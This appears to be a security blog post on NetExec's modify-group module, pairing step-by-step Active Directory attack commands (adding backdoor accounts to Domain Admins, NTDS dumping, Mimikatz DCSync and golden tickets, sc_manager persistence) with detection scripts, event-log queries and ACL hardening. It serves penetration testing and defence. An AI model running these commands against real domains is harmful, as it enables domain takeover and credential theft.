
Introduction:
NetExec (formerly CrackMapExec) is a post-exploitation tool widely used by penetration testers and red teams to interact with Active Directory (AD) environments. Its newly introduced `modify-group` module allows an attacker who has obtained valid credentials with sufficient privileges to add or remove users from any AD group – including highly sensitive ones like Domain Admins – using either the SMB or LDAP protocol. This capability dramatically simplifies privilege escalation paths and highlights the critical importance of monitoring group membership changes in enterprise Windows networks.
Learning Objectives:
- Understand how to use NetExec’s `modify-group` module to add/remove AD group members via SMB and LDAP.
- Identify detection opportunities and mitigation strategies for unauthorized group modifications.
- Execute post‑exploitation commands on Linux and Windows to enumerate groups, verify memberships, and harden Active Directory.
You Should Know:
1. Installing NetExec and Enumerating Group Permissions
NetExec is a Python‑based tool that runs on Linux (Kali, Parrot, or any distribution with Python ≥3.8). Before adding users to groups, you must identify which groups you can modify with your compromised credentials.
Step‑by‑step installation and permission enumeration:
```bash
# Install NetExec from GitHub (recommended for latest features)
sudo apt update && sudo apt install python3 pipx git
pipx ensurepath
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pipx install .
# Alternatively, install directly from the repository with pipx
pipx install git+https://github.com/Pennyw0rth/NetExec
# Verify installation
nxc --version
```
Enumerate current user’s group memberships and privileges:
```bash
# Using SMB – list all groups the user belongs to
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --groups
# Using LDAP – more detailed attribute retrieval
nxc ldap 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --kdcHost 192.168.1.10 -M get-desc-users
```
Check which groups you have write/modify permissions on (requires PowerView or BloodHound for full ACL analysis). A quick manual test for the target group:
```bash
# Attempt to add a dummy user to a test group first
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="TestGroup" user=dummy
```
If the command succeeds without access errors, you have sufficient permissions.
2. Adding a User to a Privileged Group via SMB
Once you confirm write access to a target group (e.g., Domain Admins, Enterprise Admins, or Backup Operators), you can elevate your current user or add a new backdoor account.
Step‑by‑step privilege escalation with SMB:
```bash
# Add your compromised user to Domain Admins
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=compromised_user
# Add a new attacker-controlled user
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=attacker_backdoor
# Verify the group membership change
nxc smb 192.168.1.10 -u attacker_backdoor -p 'NewPass123' --groups
```
Understanding the module parameters:
- `action=add` or `action=remove`
- `group=` – name of the target group (e.g. `group="Domain Admins"`)
- `user=` – the account to add or remove (e.g. `user=compromised_user`)
- Works over SMB only if the authenticated user has `WriteProperty` or `AddMember` delegation rights on the group object.
Alternative using LDAP (often more reliable in large domains):
```bash
nxc ldap 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=compromised_user
```
The LDAP method uses the directory’s native modify operations and may bypass certain SMB‑focused monitoring.
3. Detecting & Mitigating Unauthorized Group Modifications
Defenders must monitor for `modify-group` activity using Windows Event Logs and proper security configurations. Here are key detection commands and hardening steps.
On a Windows Domain Controller – detect group changes via Event Viewer:
- Event ID 4728: A member was added to a security‑enabled global group.
- Event ID 4729: A member was removed from a security‑enabled global group.
- Event ID 4756: A member added to a universal group.
- Event ID 4732: A member added to a local group.
PowerShell commands to monitor recent group modifications:
```powershell
# Query the Security log for group member additions in the last 24 hours.
# Property indices follow the 4728/4732/4756 event schema:
# [0] MemberName, [2] TargetUserName (the group), [6] SubjectUserName (who made the change).
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4728,4732,4756; StartTime=(Get-Date).AddDays(-1)} |
    Select-Object TimeCreated,
        @{Name='User';   Expression={$_.Properties[6].Value}},
        @{Name='Group';  Expression={$_.Properties[2].Value}},
        @{Name='Member'; Expression={$_.Properties[0].Value}}
```

```powershell
# Export group memberships to a baseline (run daily)
Get-ADGroupMember -Identity "Domain Admins" | Export-Csv -Path "C:\Audit\domain_admins_baseline.csv" -NoTypeInformation
```
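The same triage can run outside the DC, for example on events exported with `Get-WinEvent | ConvertTo-Json` and shipped to a SIEM. The following added example (not from the original post) keeps only Tier-0 group changes from 4728/4732/4756 and their removal counterparts and marks the case the SMB command above produces, an account adding itself; the event records, SIDs and group names are constructed.

```python
import re
from typing import Optional

ADD_EVENTS = {4728, 4732, 4756}     # member added to a global / local / universal group
REMOVE_EVENTS = {4729, 4733, 4757}  # member removed from the same group scopes
TIER0_GROUPS = {"domain admins", "enterprise admins", "schema admins",
                "administrators", "backup operators", "account operators"}

def cn_from_dn(dn: str) -> str:
    """Return the leading CN of a distinguished name, else the input unchanged."""
    m = re.match(r"^CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else dn

def triage(event: dict) -> Optional[dict]:
    """Return an alert for a Tier-0 add/remove event, or None for anything else."""
    eid = event["Id"]
    if eid not in ADD_EVENTS | REMOVE_EVENTS:
        return None
    props = [p["Value"] for p in event["Properties"]]
    # Event schema: [0] MemberName (DN), [2] TargetUserName (group),
    # [6] SubjectUserName (the account that made the change).
    member, group, actor = cn_from_dn(props[0]), props[2], props[6]
    if group.lower() not in TIER0_GROUPS:
        return None
    return {"time": event["TimeCreated"],
            "action": "add" if eid in ADD_EVENTS else "remove",
            "group": group, "member": member, "actor": actor,
            # CN normally equals sAMAccountName; a match means the actor added itself.
            "self_elevation": member.lower() == actor.lower()}

def triage_all(events: list) -> list:
    return [alert for alert in map(triage, events) if alert]

def make_event(eid: int, time: str, member_dn: str, group: str, actor: str) -> dict:
    """Build a constructed record in the 4728-style property order (SIDs are fake)."""
    values = [member_dn, "S-1-5-21-0-0-0-1105", group, "DOMAIN", "S-1-5-21-0-0-0-512",
              "S-1-5-21-0-0-0-1105", actor, "DOMAIN", "0x3e7", "-"]
    return {"Id": eid, "TimeCreated": time, "Properties": [{"Value": v} for v in values]}

# Constructed sample: a routine helpdesk add, the self-add to Domain Admins
# that the SMB modify-group command above produces, and a removal.
SAMPLE_EVENTS = [
    make_event(4728, "2025-01-10T09:01:00", "CN=jdoe,CN=Users,DC=domain,DC=com", "Helpdesk", "svc_idm"),
    make_event(4728, "2025-01-10T09:02:00", "CN=compromised_user,CN=Users,DC=domain,DC=com",
               "Domain Admins", "compromised_user"),
    make_event(4729, "2025-01-10T09:03:00", "CN=old_admin,CN=Users,DC=domain,DC=com", "Domain Admins", "it_admin"),
]
```

Running `triage_all(SAMPLE_EVENTS)` yields two alerts: the self-elevation into Domain Admins and the removal from it, while the Helpdesk add is dropped.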
Mitigation actions – restrict who can modify privileged groups:
```powershell
# From a Domain Admin elevated PowerShell session
# Read the current ACL on the Domain Admins group
$group = Get-ADGroup "Domain Admins"
$acl = Get-ACL "AD:\$($group.DistinguishedName)"
# Remove write permissions granted to accounts outside the protected set
$allowed = @("NT AUTHORITY\SYSTEM", "BUILTIN\Administrators", "DOMAIN\Domain Admins", "DOMAIN\Enterprise Admins")
$acl.Access |
    Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner" -and
                   $_.IdentityReference.Value -notin $allowed -and -not $_.IsInherited } |
    ForEach-Object { $acl.RemoveAccessRule($_) | Out-Null }
Set-ACL -AclObject $acl -Path "AD:\$($group.DistinguishedName)"
# Domain Admins is a protected group: SDProp re-stamps its ACL from AdminSDHolder every
# 60 minutes, so apply the same clean-up to AdminSDHolder or the change will be undone.
# Protect the AdminSDHolder object itself from accidental deletion
Set-ADObject -Identity "CN=AdminSDHolder,CN=System,DC=domain,DC=com" -ProtectedFromAccidentalDeletion $true
```
4. Full Attack Chain: From Group Membership to Domain Compromise
After adding yourself to a high‑privilege group, you can perform several post‑exploitation actions to fully compromise the domain.
Step‑by‑step exploitation sequence:
1. Update your Kerberos ticket (required for newly added groups to reflect):
```cmd
REM On Windows attacker machine (as newly elevated user)
klist purge
runas /netonly /user:domain\compromised_user cmd.exe
```
2. Dump domain credentials using DCSync:
```bash
# Using NetExec with DCSync (needs Domain Replication rights)
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --ntds vss
```
3. Create a Golden Ticket (using Mimikatz on Windows or ticketer on Linux):
```cmd
REM On Windows with administrator privileges
mimikatz.exe "lsadump::dcsync /user:krbtgt" "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt" "exit"
```
4. Persist through Scheduled Tasks:
```bash
# Using NetExec’s sc_manager module
nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M sc_manager -o action=create name=Backdoor binpath="C:\Windows\System32\cmd.exe /c net user backdoor Pass123 /add /domain"
```
5. Defensive Hardening Commands for Active Directory
System administrators should implement the following measures to block NetExec’s `modify-group` module.
On Windows Domain Controllers and member servers:
```powershell
# Enforce minimum permission for group modifications – remove generic write ACLs.
# List all groups with write access held by someone other than the expected owners.
Get-ADGroup -Filter * | ForEach-Object {
    $groupDN = $_.DistinguishedName
    (Get-ACL "AD:\$groupDN").Access |
        Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|GenericAll|GenericWrite" -and
                       $_.IdentityReference -notin @("NT AUTHORITY\SYSTEM","DOMAIN\Domain Admins") } |
        Select-Object @{Name='Group';Expression={$groupDN}}, IdentityReference, ActiveDirectoryRights, IsInherited
}
```

```powershell
# Enable advanced audit policies for group management
auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
```

```powershell
# Harden the SMB server against anonymous (null-session) access. This does not stop an
# authenticated user with delegated rights from changing group membership over SMB;
# the ACL clean-up above is what removes that capability.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictNullSessAccess" -Value 1 -Type DWORD
```
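The PowerShell listing above reports every ACE matching `WriteProperty`; the added example below (not from the original post) shows the narrower test a reviewer actually wants when working from an exported DACL: does the ACE let a non-allowlisted principal change membership? That means `GenericAll`/`GenericWrite`/`WriteDacl`/`WriteOwner`, or `WriteProperty`/`Self` scoped to the `member` attribute (schemaIDGUID `bf9679c0-0de6-11d0-a285-00aa003049e2`) or to all attributes. Field names mirror the .NET `ActiveDirectoryAccessRule` properties; the sample ACL, principals and the non-member GUID are constructed.

```python
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # schemaIDGUID of the `member` attribute
ALL_ATTRIBUTES_GUID = "00000000-0000-0000-0000-000000000000"  # ACE applies to every attribute
# Rights that control the object outright or let the holder rewrite its DACL.
BROAD_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
ALLOWLIST = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
             "DOMAIN\\Domain Admins", "DOMAIN\\Enterprise Admins"}

def grants_membership_write(ace: dict) -> bool:
    """True if this ACE lets its principal add or remove members of the group."""
    if ace["AccessControlType"] != "Allow":
        return False
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    if rights & BROAD_RIGHTS:
        return True
    # WriteProperty on `member` is the classic delegation; Self on `member` lets the
    # principal add or remove only its own account, which is still an escalation path.
    if rights & {"WriteProperty", "Self"}:
        return ace["ObjectType"].lower() in (MEMBER_ATTR_GUID, ALL_ATTRIBUTES_GUID)
    return False

def review_group_acl(group: str, aces: list) -> list:
    """Return the ACEs on `group` giving membership write to non-allowlisted principals."""
    return [{"group": group, "principal": ace["IdentityReference"],
             "rights": ace["ActiveDirectoryRights"], "inherited": ace["IsInherited"]}
            for ace in aces
            if grants_membership_write(ace) and ace["IdentityReference"] not in ALLOWLIST]

def _ace(principal, rights, object_type, kind="Allow", inherited=False):
    """Build a constructed ACE record with the ActiveDirectoryAccessRule field names."""
    return {"IdentityReference": principal, "ActiveDirectoryRights": rights,
            "ObjectType": object_type, "AccessControlType": kind, "IsInherited": inherited}

OTHER_ATTR_GUID = "11111111-1111-1111-1111-111111111111"  # placeholder: some non-member attribute

# Constructed sample DACL for "Domain Admins": only the helpdesk delegation on
# `member` is the kind of ACE the modify-group module needs.
SAMPLE_ACL = [
    _ace("NT AUTHORITY\\SYSTEM", "GenericAll", ALL_ATTRIBUTES_GUID),
    _ace("DOMAIN\\Helpdesk", "WriteProperty", MEMBER_ATTR_GUID),
    _ace("DOMAIN\\Authenticated Users", "ReadProperty, GenericExecute", ALL_ATTRIBUTES_GUID, inherited=True),
    _ace("DOMAIN\\Interns", "WriteProperty", MEMBER_ATTR_GUID, kind="Deny"),
    _ace("DOMAIN\\Helpdesk", "WriteProperty", OTHER_ATTR_GUID),
]
```

Because Domain Admins and the other protected groups get their ACL re-stamped from AdminSDHolder by SDProp, run the review against AdminSDHolder as well and fix any finding there, not only on the group object.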
On Linux (jump host / management server) – restrict NetExec installations and monitor for its use:
```bash
# Detect NetExec usage by scanning process lists
ps aux | grep -E 'nxc|crackmapexec'
# Restrict execution via AppArmor or SELinux (example for Ubuntu)
sudo aa-genprof /usr/local/bin/nxc
# Follow the prompts to create a strict profile
```
What Undercode Say:
- Key Takeaway 1: NetExec’s `modify-group` module transforms a “low-privilege” user with delegated group write rights into a domain administrator within minutes – emphasizing that ACL misconfigurations are as dangerous as credential theft.
- Key Takeaway 2: Defenders must move beyond simple password hygiene and implement real‑time monitoring of Event IDs 4728, 4732, and 4756, combined with strict delegation models (e.g., tiered administration and PAM solutions).
The `modify-group` feature highlights a recurring theme in AD security: privileges often flow through group memberships, and any account that can alter those memberships holds the keys to the kingdom. While penetration testers gain an efficient new primitive, blue teams now have a clear attack signature to hunt – abrupt additions to sensitive groups, especially over SMB or LDAP from unexpected workstations. The most effective mitigation remains the principle of least privilege combined with regular ACL reviews using tools like BloodHound or PurpleKnight. Organizations still relying on “Domain Admins” for routine administrative work are especially vulnerable. Automating alerting on group changes and requiring secondary approval (e.g., via JIT access solutions) can neuter this attack entirely.
Prediction:
As NetExec continues to evolve, expect to see this group-modification capability weaponized in ransomware intrusions where attackers first add a rogue account to Backup Operators or Domain Admins to disable recovery options. Microsoft will likely respond by introducing more granular Protected Users group controls or marking LDAP group modification requests as high-risk events in Identity Protection. Meanwhile, the open-source community will build detection scripts that parse NetExec’s specific user-agent strings and module command lines, forcing attackers to shift to less convenient methods (e.g., direct PowerShell or Cobalt Strike lateral movement). Ultimately, the convenience of `modify-group` for red teams will mirror its danger in the wild – making group membership hardening a top priority for 2026.
Reported By: Josecampo Nxc – Hackers Feeds